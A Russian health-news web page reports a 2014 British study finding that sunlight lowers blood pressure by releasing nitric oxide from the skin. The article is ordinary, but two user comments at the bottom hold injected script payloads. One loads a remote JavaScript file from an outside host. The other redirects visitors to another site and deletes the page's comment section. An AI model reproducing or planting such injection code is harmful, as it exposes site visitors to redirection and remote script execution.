Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Бегом на улицу! Солнце по...  >>  Бегом на улицу! Солнце понижает давление!
 
Обратная связь
 

Бегом на улицу! Солнце понижает давление!

Размер шрифта
22 июля 2014 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

При воздействии солнца на кожу понижается давление, а, следовательно, и риски инфаркта и инсульта!

Бегом на улицу! Солнце понижает давление!

Оказалось, что солнце воздействует на биологически активное вещество – NO (оксид азота) – в коже и крови, приводя к снижению артериального давления.

«NO и продукты его метаболизма, которые в большом количестве содержатся в коже, способны влиять на артериальное давление. При воздействии солнечного света увеличивается поступление NO из кожи в кровяное русло, что приводит к снижению давления», – поясняет профессор Мартин Филиш из Саутгемптонского университета, Англия.

В то время как рекомендуется ограничить пребывание на солнце в целях снижения вероятности онкологии кожи, авторы данного исследования, включая доктора Ричарда Веллера из Эдинбургского университета, считают, что минимизация солнечного воздействия может неблагоприятно влиять на здоровье, повышая риск заболеваний сердечно-сосудистой системы.

Сердечно-сосудистые заболевания зачастую связаны с повышенным артериальным давлением. Они ответственны за 30% смертей по всему миру. Показано, что их распространенность зависит от времени года и широты. В зимнее время и в странах, удаленных от экватора, где меньше воздействие солнца на кожу, эти заболевания встречаются чаще.

В ходе исследования кожу 24 здоровых добровольцев подвергали воздействию специальных ламп в течение двух сессий по 20 минут каждая. Во время первой сессии участников подвергали как влиянию ультрафиолета, так и влиянию тепловых ламп. Во вторую сессию работали лишь тепловые лампы.

Результаты показали, что ультрафиолет значительно расширял сосуды и снижал давление, влияя на содержание NO в крови. При этом не изменялся уровень витамина D. Дальнейшие эксперименты доказали, что в дело вступают запасы NO, находящиеся в верхних слоях кожи. Результаты подкрепляются наблюдениями сезонной вариабельности кровяного давления и повышенным риском сердечно-сосудистых заболеваний в умеренных широтах.

«Наши результаты вносят серьезный вклад в дебаты о потенциальном значении солнечного излучения и роли витамина D в этом процессе. Возможно, требуется переоценка плюсов и минусов пребывания на солнце. Разумеется, мы не призываем к максимальному нахождению на улице, однако избегать солнца полностью не советуем из-за риска сердечно-сосудистых заболеваний, – делится профессор Филиш. – Роль кожных запасов NO в снижении давления недооценена. В наших дальнейших исследованиях мы планируем выявить долговременный эффект влияния оксида азота, а также разработать план питания для обогащения запасов этого вещества в организме».

Данная статья основана на материалах, предоставленных Саутгемптонским университетом, Англия. Результаты исследования были опубликованы в 2014 году.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:32

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Надо завести сердце? Выпей кофе!   Не психуй! Взрывы гнева увеличивают шансы инфаркта!   Отдыхаете на пляже, выпиваете? Вот что алкоголь делает с кожей на солнце   В поисках самого здорового человека  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 22 июня 2013Грецкие орехи спасут от инфаркта
 
20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
9 причин заставить мужа заниматься сексом!
Вся правда о давлении
Зачем спать 10 затем

Тесты

1
Будет ли у вас инфаркт?
Как устроены волосы человека?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.